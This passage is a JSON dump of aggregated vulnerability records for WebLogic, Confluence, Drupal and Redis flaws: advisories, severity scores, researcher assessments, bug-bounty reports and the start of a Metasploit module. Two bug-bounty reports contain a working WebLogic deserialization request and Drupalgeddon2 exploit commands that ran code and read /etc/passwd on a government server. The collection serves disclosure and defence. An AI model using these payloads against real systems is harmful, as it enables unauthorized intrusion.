"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-01-10T00:00:00", "id": "CISA-KEV-CVE-2019-2725", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Redis is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T00:00:00", "type": "cisa_kev", "title": "Debian-specific Redis Server Lua Sandbox Escape Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0543"], "modified": "2022-03-28T00:00:00", "id": "CISA-KEV-CVE-2022-0543", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2021-06-08T19:08:30", "description": "### Description\n\nOracle WebLogic Server is prone to a remote security vulnerability in WLS Security. The vulnerability can be exploited over the 'HTTP' protocol. 
This vulnerability affects the following supported versions: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0\n\n### Technologies Affected\n\n * Oracle Weblogic Server 10.3.6.0 \n * Oracle Weblogic Server 12.1.3.0 \n * Oracle Weblogic Server 12.2.1.1 \n * Oracle Weblogic Server 12.2.1.2 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Modify default ACL settings.** \nImplement database access control to limit the immediate impact of such vulnerabilities on the data and possibly the database itself. Ensure that applications are isolated from one another and from sensitive data through separate user accounts and restrictive ACL configurations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure servers and other applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-10-17T00:00:00", "type": "symantec", "title": "Oracle WebLogic Server CVE-2017-10271 Remote Security Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2017-10-17T00:00:00", "id": "SMNTC-101304", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101304", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "attackerkb": [{"lastseen": "2022-03-28T17:37:53", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).\n\n \n**Recent assessments:** \n \n**wchen-r7** at May 23, 2019 5:44pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\n**asoto-r7** at September 12, 2019 6:06pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. 
Should be a pentester\u2019s favorite.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-19T00:00:00", "type": "attackerkb", "title": "CVE-2017-10271 - Oracle WebLogic Server AsyncResponseService Deserialization Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2021-07-27T00:00:00", "id": "AKB:7992242A-E0F4-4572-BE13-859467611F09", "href": "https://attackerkb.com/topics/KjHcjsGuez/cve-2017-10271---oracle-weblogic-server-asyncresponseservice-deserialization-vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-17T23:03:20", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. 
The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if \u2018Allow people to sign up to create their account\u2019 is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 02, 2021 1:27am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**NinjaOperator** at September 01, 2021 5:38pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**GhostlaX** at September 04, 2021 1:44am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**Cherylyin** at September 03, 2021 2:03am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. 
:)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-26084 Confluence Server OGNL injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-04T00:00:00", "id": "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "href": "https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-13T05:03:04", "description": "This exploits a Drupal property injection in the Forms API. 
Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n\nDrupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 03, 2020 3:50pm UTC reported:\n\nDue to many public exploits for this flaw this is an incredibly valuable tool for an attacker to have in their arsenal. My favorite variant of this exploit is: <https://github.com/g0tmi1k/Drupalgeddon2>\n\n**busterb** at May 09, 2019 5:57pm UTC reported:\n\nDue to many public exploits for this flaw this is an incredibly valuable tool for an attacker to have in their arsenal. My favorite variant of this exploit is: <https://github.com/g0tmi1k/Drupalgeddon2>\n\n**hrbrmstr** at May 12, 2020 7:54pm UTC reported:\n\nDue to many public exploits for this flaw this is an incredibly valuable tool for an attacker to have in their arsenal. 
My favorite variant of this exploit is: <https://github.com/g0tmi1k/Drupalgeddon2>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "attackerkb", "title": "Drupalgeddon 2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2020-09-02T00:00:00", "id": "AKB:3374FB55-2A44-4607-A9C5-265E7DE9B936", "href": "https://attackerkb.com/topics/0gCgI4g4Z2/drupalgeddon-2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-27T20:35:44", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). 
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**asoto-r7** at May 09, 2019 5:57pm UTC reported:\n\nCVE-2019-2725 (aka CNVD-C 2019-48814) exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component. The exploit provides an unauthenticated attacker with remote arbitrary command execution.\n\nAccording to the vendor, Oracle WebLogic Server v10.3.6.0 and 12.1.3.0 are affected.\n\nIn addition to a public proof-of-concept, a Metasploit module has been published to allow for exploitation of Windows, Linux, and Unix hosts. It has been successfully tested on v10.3.6.0, and exploitation failed against 12.2.1.2.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-26T00:00:00", "type": "attackerkb", "title": "CVE-2019-2725", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2021-07-22T00:00:00", "id": "AKB:9B4E2AEC-697D-42F0-9FED-B010FB1F82ED", "href": 
"https://attackerkb.com/topics/GmCoX0fF2M/cve-2019-2725", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-27T23:35:15", "description": "It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.\n\n \n**Recent assessments:** \n \n**NinjaOperator** at March 25, 2022 8:04pm UTC reported:\n\nMuhstik Gang has been seen exploiting this vulnerability to target Redis servers \nPoc is publicly available <https://github.com/aodsec/CVE-2022-0543>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T00:00:00", "type": "attackerkb", "title": "CVE-2022-0543", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0543"], "modified": "2022-04-27T00:00:00", "id": "AKB:3C5CF154-6882-4093-86F8-445BF9DCEF8A", "href": "https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": 
[{"lastseen": "2019-07-02T07:43:34", "bounty": 0.0, "description": "**Summary:**\nHappy Friday! The server at `\u2588\u2588\u2588\u2588\u2588\u2588` is vulnerable to CVE-2017-10271 \"Oracle WebLogic Server Remote Command Execution\".\n\n**Description:**\nThe following request takes 12 seconds (12000 milliseconds) to complete:\n```\nPOST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nContent-Length: 423\ncontent-type: text/xml\nAccept-Encoding: gzip, deflate, compress\nAccept: */*\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java class=\"java.beans.XMLDecoder\">\n <object class=\"java.lang.Thread\" method=\"sleep\">\n <long>12000</long>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n```\nThis proves that I have Java code execution on the remote server. \n\nref: https://techblog.mediaservice.net/2018/07/cve-2017-10271-oracle-weblogic-server-remote-command-execution-sleep-detection-payload/\n\nPublic exploits for this exist: https://github.com/c0mmand3rOpSec/CVE-2017-10271\nI was not able to use that script with a `ping` command, which might have been blocked by preventing outbound connections.\n\n## Suggested Mitigation/Remediation Actions\nPatch & possibly don't allow external access.\n\n## Impact\n\nCritical, RCE.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-05-10T22:23:31", "type": "hackerone", "title": "U.S. 
Dept Of Defense: RCE on \u2588\u2588\u2588\u2588\u2588 via CVE-2017-10271", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2019-07-01T19:54:20", "id": "H1:576887", "href": "https://hackerone.com/reports/576887", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-04-09T01:28:40", "bounty": 0.0, "description": "## Summary \nDue to an outdated Drupal version, remote code execution is possible on `www.\u2588\u2588\u2588\u2588\u2588` via CVE-2018-7600. \n\n## Description\nDrupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. \n\nVulnerable Host:\n * `www.\u2588\u2588\u2588`\n\nVisiting `https://www.\u2588\u2588\u2588/\u2588\u2588\u2588` we can see that we have a Drupal with version 7.54, which was updated the last time in 2017-02-01.\n\nThere are several critical and highly critical vulnerabilities known for this version (see `https://api.drupal.org/api/drupal/\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/7.x` and `https://www.drupal.org/security`). Among them is `SA-CORE-2018-002` (CVE-2018-7600), which I will demonstrate here. \n\nNote: I am reporting this here, since the page `https://www.\u2588\u2588\u2588\u2588\u2588\u2588\u2588` seems to belong to the \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588, which belongs to the DOD. 
The footer further states: `\u2588\u2588\u2588\u2588\u2588\u2588. [...]`\n\n## Step-by-step Reproduction Instructions\n\n1. Download the git repository with the exploit: `git clone https://github.com/dreadlocked/Drupalgeddon2.git && cd Drupalgeddon2`\n * Install dependencies if necessary `gem install nokogiri`\n\n2. Run the exploit with ruby `ruby drupalgeddon2-customizable-beta.rb -u https://www.\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/ -v 7 -c id --form user/login`\n\nParameters explanation: \n```\n-u, --url URL Service URL\n-v, --version VERSION Target Drupal version {7,8}\n-c, --command COMMAND Command to execute\n--form Form to attack, by default '/user/password' in Drupal 7 \n```\nThe above command outputs:\n```\nroot@5b08dc005375:/Drupalgeddon2# ruby drupalgeddon2-customizable-beta.rb -u https://www.\u2588\u2588\u2588\u2588/ -v 7 -c id --form user/login\ndrupalgeddon2-customizable-beta.rb:184: warning: URI.escape is obsolete\n[i] Requesting: www.\u2588\u2588\u2588\u2588\u2588\u2588\u2588//user/password/?name[%23post_render][]=passthru&name[%23markup]=id&name[%23type]=markup\n[i] POST: form_id=user_pass&_triggering_element_name=name\n[i] 200\n[*] Obtained build id!: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\ndrupalgeddon2-customizable-beta.rb:220: warning: URI.escape is obsolete\ndrupalgeddon2-customizable-beta.rb:221: warning: URI.escape is obsolete\n[i] Requesting: www.\u2588\u2588\u2588\u2588\u2588/file/ajax/name/%23value/\u2588\u2588\u2588\u2588\u2588\u2588\n[i] POST: form_build_id=\u2588\u2588\u2588\u2588\u2588\n[i] Response code: 200\nuid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0\nroot@5b08dc005375:/Drupalgeddon2# \n```\nAs we can see, we successfully executed the `id` command, which responded with `uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0`\n\nI am also providing the output of `/etc/passwd` which I obtained with command \n```\nruby 
drupalgeddon2-customizable-beta.rb -u https://www.\u2588\u2588\u2588\u2588\u2588\u2588/ -v 7 -c \"cat /etc/passwd\" --form user/login\n```\nOutput: \n```\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\n```\n\n## Resources\n * https://api.drupal.org/api/drupal/\u2588\u2588\u2588\u2588\u2588/7.x\n * https://www.drupal.org/security\n * https://github.com/dreadlocked/Drupalgeddon2\n * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600\n * https://www.drupal.org/sa-core-2018-002\n\n## Mitigation/Remediation Actions\nUpgrade to the most recent version of Drupal 7 core.\n\n## Impact\n\nCritical - Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-12-21T07:51:14", "type": "hackerone", "title": "U.S. Dept Of Defense: [CVE-2018-7600] Remote Code Execution due to outdated Drupal server on www.\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2021-03-24T20:24:17", "id": "H1:1063256", "href": "https://hackerone.com/reports/1063256", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-06-24T09:22:36", "description": "The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. 
Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself.\n", "cvss3": {}, "published": "2018-01-05T20:05:21", "type": "metasploit", "title": "Oracle WebLogic wls-wsat Component Deserialization RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2022-03-09T23:28:25", "id": "MSF:EXPLOIT-MULTI-HTTP-ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n # include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',\n 'Description' => %q(\n The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization\n remote code execution vulnerability. Supported versions that are affected are\n 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin\n of ERPScan and Federico Dotta of Media Service. 
Please note that SRVHOST, SRVPORT,\n HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check\n and will not be used when executing the exploit itself.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module\n 'Luffin', # Proof of Concept\n 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery\n ],\n 'References' =>\n [\n ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin\n ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept\n ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit\n ['CVE', '2017-10271'],\n ['EDB', '43458']\n ],\n 'Platform' => %w{ win unix },\n 'Arch' => [ ARCH_CMD ],\n 'Targets' =>\n [\n [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],\n [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]\n ],\n 'DisclosureDate' => '2017-10-19',\n # Note that this is by index, rather than name. 
